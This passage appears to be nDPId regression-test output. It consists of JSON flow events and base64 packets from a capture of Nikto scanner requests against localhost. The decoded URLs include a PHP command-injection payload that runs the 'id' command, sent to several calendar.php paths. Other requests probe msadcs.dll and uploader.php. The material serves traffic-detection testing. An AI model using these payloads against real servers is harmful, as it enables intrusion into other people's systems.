(Evasions:None) (Test:001474)"}} +01055{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":715,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":715,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277847,"flow_last_seen":1576420277847,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277847,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50992,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": 
{"hostname":"127.0.0.1","url":"127.0.0.1\/msadc\/msadcs.dll","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001474)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":716,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":716,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277849,"flow_last_seen":1576420277849,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277849,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50994,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":716,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":716,"flow_packet_id":1,"flow_last_seen":1576420277849,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420277849,"pkt":"AAAAAAAAAAAAAAAACABFAADBYllAAEAG2dt\/AAABfwAAAccyH5AM9ltiiZJuH4AYAED+tQAAAQEICp1m\/4GdZv+AR0VUIC91cGxvYWRlci5waHAgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMzAxOCkNCg0K"} -01050{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":716,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":716,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277849,"flow_last_seen":1576420277849,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277849,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50994,"dst_port":8080,"l4_proto":"tcp","ndpi": 
{"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/uploader.php","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003018)"}} +01050{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":716,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":716,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277849,"flow_last_seen":1576420277849,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277849,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50994,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/uploader.php","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003018)"}} 
00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":717,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":717,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277850,"flow_last_seen":1576420277850,"flow_idle_time":7580000,"flow_min_l4_payload_len":240,"flow_max_l4_payload_len":240,"flow_tot_l4_payload_len":240,"flow_avg_l4_payload_len":240,"midstream":1,"thread_ts_msec":1576420277850,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50996,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00800{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":717,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":717,"flow_packet_id":1,"flow_last_seen":1576420277850,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":306,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":306,"pkt_l4_len":272,"thread_ts_msec":1576420277850,"pkt":"AAAAAAAAAAAAAAAACABFAAEkktVAAEAGqPx\/AAABfwAAAcc0H5D516vm6SxeZoAYAED\/GAAAAQEICp1m\/4KdZv+CR0VUIC9jYWxlbmRhci5waHA\/Y2FsYmlydGhkYXlzPTEmYWN0aW9uPWdldGRheSZkYXk9MjAwMS04LTE1JmNvbW1hPSUyMjtlY2hvJTIwJyc7JTIwZWNobyUyMCU2MGlkJTIwJTYwO2RpZSgpO2VjaG8lMjIgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMzAzOSkNCg0K"} -01149{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":717,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":717,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277850,"flow_last_seen":1576420277850,"flow_idle_time":7580000,"flow_min_l4_payload_len":240,"flow_max_l4_payload_len":240,"flow_tot_l4_payload_len":240,"flow_avg_l4_payload_len":240,"midstream":1,"thread_ts_msec":1576420277850,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50996,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known 
Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/calendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003039)"}} +01149{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":717,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":717,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277850,"flow_last_seen":1576420277850,"flow_idle_time":7580000,"flow_min_l4_payload_len":240,"flow_max_l4_payload_len":240,"flow_tot_l4_payload_len":240,"flow_avg_l4_payload_len":240,"midstream":1,"thread_ts_msec":1576420277850,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50996,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/calendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003039)"}} 
00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":718,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":718,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277851,"flow_last_seen":1576420277851,"flow_idle_time":7580000,"flow_min_l4_payload_len":246,"flow_max_l4_payload_len":246,"flow_tot_l4_payload_len":246,"flow_avg_l4_payload_len":246,"midstream":1,"thread_ts_msec":1576420277851,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50998,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00809{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":718,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":718,"flow_packet_id":1,"flow_last_seen":1576420277851,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":312,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":312,"pkt_l4_len":278,"thread_ts_msec":1576420277851,"pkt":"AAAAAAAAAAAAAAAACABFAAEqh81AAEAGs\/5\/AAABfwAAAcc2H5Bgvr79vMi8roAYAED\/HgAAAQEICp1m\/4OdZv+DR0VUIC9mb3J1bS9jYWxlbmRhci5waHA\/Y2FsYmlydGhkYXlzPTEmYWN0aW9uPWdldGRheSZkYXk9MjAwMS04LTE1JmNvbW1hPSUyMjtlY2hvJTIwJyc7JTIwZWNobyUyMCU2MGlkJTIwJTYwO2RpZSgpO2VjaG8lMjIgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMzAzOSkNCg0K"} -01156{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":718,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":718,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277851,"flow_last_seen":1576420277851,"flow_idle_time":7580000,"flow_min_l4_payload_len":246,"flow_max_l4_payload_len":246,"flow_tot_l4_payload_len":246,"flow_avg_l4_payload_len":246,"midstream":1,"thread_ts_msec":1576420277851,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50998,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": 
{"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/forum\/calendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003039)"}} +01156{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":718,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":718,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277851,"flow_last_seen":1576420277851,"flow_idle_time":7580000,"flow_min_l4_payload_len":246,"flow_max_l4_payload_len":246,"flow_tot_l4_payload_len":246,"flow_avg_l4_payload_len":246,"midstream":1,"thread_ts_msec":1576420277851,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50998,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/forum\/calendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003039)"}} 
00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":719,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":719,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277854,"flow_last_seen":1576420277854,"flow_idle_time":7580000,"flow_min_l4_payload_len":247,"flow_max_l4_payload_len":247,"flow_tot_l4_payload_len":247,"flow_avg_l4_payload_len":247,"midstream":1,"thread_ts_msec":1576420277854,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51000,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00811{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":719,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":719,"flow_packet_id":1,"flow_last_seen":1576420277854,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":313,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":313,"pkt_l4_len":279,"thread_ts_msec":1576420277854,"pkt":"AAAAAAAAAAAAAAAACABFAAErhnRAAEAGtVZ\/AAABfwAAAcc4H5AJP79Gqf4KlIAYAED\/HwAAAQEICp1m\/4adZv+GR0VUIC9mb3J1bXMvY2FsZW5kYXIucGhwP2NhbGJpcnRoZGF5cz0xJmFjdGlvbj1nZXRkYXkmZGF5PTIwMDEtOC0xNSZjb21tYT0lMjI7ZWNobyUyMCcnOyUyMGVjaG8lMjAlNjBpZCUyMCU2MDtkaWUoKTtlY2hvJTIyIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDMwMzkpDQoNCg=="} -01157{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":719,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":719,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277854,"flow_last_seen":1576420277854,"flow_idle_time":7580000,"flow_min_l4_payload_len":247,"flow_max_l4_payload_len":247,"flow_tot_l4_payload_len":247,"flow_avg_l4_payload_len":247,"midstream":1,"thread_ts_msec":1576420277854,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51000,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": 
{"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/forums\/calendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003039)"}} +01157{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":719,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":719,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277854,"flow_last_seen":1576420277854,"flow_idle_time":7580000,"flow_min_l4_payload_len":247,"flow_max_l4_payload_len":247,"flow_tot_l4_payload_len":247,"flow_avg_l4_payload_len":247,"midstream":1,"thread_ts_msec":1576420277854,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51000,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/forums\/calendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003039)"}} 
00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":720,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":720,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277855,"flow_last_seen":1576420277855,"flow_idle_time":7580000,"flow_min_l4_payload_len":247,"flow_max_l4_payload_len":247,"flow_tot_l4_payload_len":247,"flow_avg_l4_payload_len":247,"midstream":1,"thread_ts_msec":1576420277855,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51002,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00812{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":720,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":720,"flow_packet_id":1,"flow_last_seen":1576420277855,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":313,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":313,"pkt_l4_len":279,"thread_ts_msec":1576420277855,"pkt":"AAAAAAAAAAAAAAAACABFAAErbT9AAEAGzot\/AAABfwAAAcc6H5Be6VQGyl7\/vYAYAED\/HwAAAQEICp1m\/4edZv+HR0VUIC9mb3J1bXovY2FsZW5kYXIucGhwP2NhbGJpcnRoZGF5cz0xJmFjdGlvbj1nZXRkYXkmZGF5PTIwMDEtOC0xNSZjb21tYT0lMjI7ZWNobyUyMCcnOyUyMGVjaG8lMjAlNjBpZCUyMCU2MDtkaWUoKTtlY2hvJTIyIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDMwMzkpDQoNCg=="} -01157{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":720,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":720,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277855,"flow_last_seen":1576420277855,"flow_idle_time":7580000,"flow_min_l4_payload_len":247,"flow_max_l4_payload_len":247,"flow_tot_l4_payload_len":247,"flow_avg_l4_payload_len":247,"midstream":1,"thread_ts_msec":1576420277855,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51002,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": 
{"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/forumz\/calendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003039)"}} +01157{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":720,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":720,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277855,"flow_last_seen":1576420277855,"flow_idle_time":7580000,"flow_min_l4_payload_len":247,"flow_max_l4_payload_len":247,"flow_tot_l4_payload_len":247,"flow_avg_l4_payload_len":247,"midstream":1,"thread_ts_msec":1576420277855,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51002,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/forumz\/calendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003039)"}} 
00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":721,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":721,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277857,"flow_last_seen":1576420277857,"flow_idle_time":7580000,"flow_min_l4_payload_len":248,"flow_max_l4_payload_len":248,"flow_tot_l4_payload_len":248,"flow_avg_l4_payload_len":248,"midstream":1,"thread_ts_msec":1576420277857,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51004,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00811{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":721,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":721,"flow_packet_id":1,"flow_last_seen":1576420277857,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":314,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":314,"pkt_l4_len":280,"thread_ts_msec":1576420277857,"pkt":"AAAAAAAAAAAAAAAACABFAAEsZgtAAEAG1b5\/AAABfwAAAcc8H5AWK18ypPoEwIAYAED\/IAAAAQEICp1m\/4mdZv+JR0VUIC9odGZvcnVtL2NhbGVuZGFyLnBocD9jYWxiaXJ0aGRheXM9MSZhY3Rpb249Z2V0ZGF5JmRheT0yMDAxLTgtMTUmY29tbWE9JTIyO2VjaG8lMjAnJzslMjBlY2hvJTIwJTYwaWQlMjAlNjA7ZGllKCk7ZWNobyUyMiBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAzMDM5KQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="} -01158{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":721,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":721,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277857,"flow_last_seen":1576420277857,"flow_idle_time":7580000,"flow_min_l4_payload_len":248,"flow_max_l4_payload_len":248,"flow_tot_l4_payload_len":248,"flow_avg_l4_payload_len":248,"midstream":1,"thread_ts_msec":1576420277857,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51004,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": 
{"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/htforum\/calendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003039)"}} +01158{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":721,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":721,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277857,"flow_last_seen":1576420277857,"flow_idle_time":7580000,"flow_min_l4_payload_len":248,"flow_max_l4_payload_len":248,"flow_tot_l4_payload_len":248,"flow_avg_l4_payload_len":248,"midstream":1,"thread_ts_msec":1576420277857,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51004,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/htforum\/calendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003039)"}} 
00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":722,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":722,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277858,"flow_last_seen":1576420277858,"flow_idle_time":7580000,"flow_min_l4_payload_len":246,"flow_max_l4_payload_len":246,"flow_tot_l4_payload_len":246,"flow_avg_l4_payload_len":246,"midstream":1,"thread_ts_msec":1576420277858,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51006,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00808{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":722,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":722,"flow_packet_id":1,"flow_last_seen":1576420277858,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":312,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":312,"pkt_l4_len":278,"thread_ts_msec":1576420277858,"pkt":"AAAAAAAAAAAAAAAACABFAAEqtcxAAEAGhf9\/AAABfwAAAcc+H5DIWozz4BLqQYAYAED\/HgAAAQEICp1m\/4qdZv+KR0VUIC9ib2FyZC9jYWxlbmRhci5waHA\/Y2FsYmlydGhkYXlzPTEmYWN0aW9uPWdldGRheSZkYXk9MjAwMS04LTE1JmNvbW1hPSUyMjtlY2hvJTIwJyc7JTIwZWNobyUyMCU2MGlkJTIwJTYwO2RpZSgpO2VjaG8lMjIgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMzAzOSkNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"} -01156{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":722,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":722,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277858,"flow_last_seen":1576420277858,"flow_idle_time":7580000,"flow_min_l4_payload_len":246,"flow_max_l4_payload_len":246,"flow_tot_l4_payload_len":246,"flow_avg_l4_payload_len":246,"midstream":1,"thread_ts_msec":1576420277858,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51006,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": 
{"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/board\/calendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003039)"}} 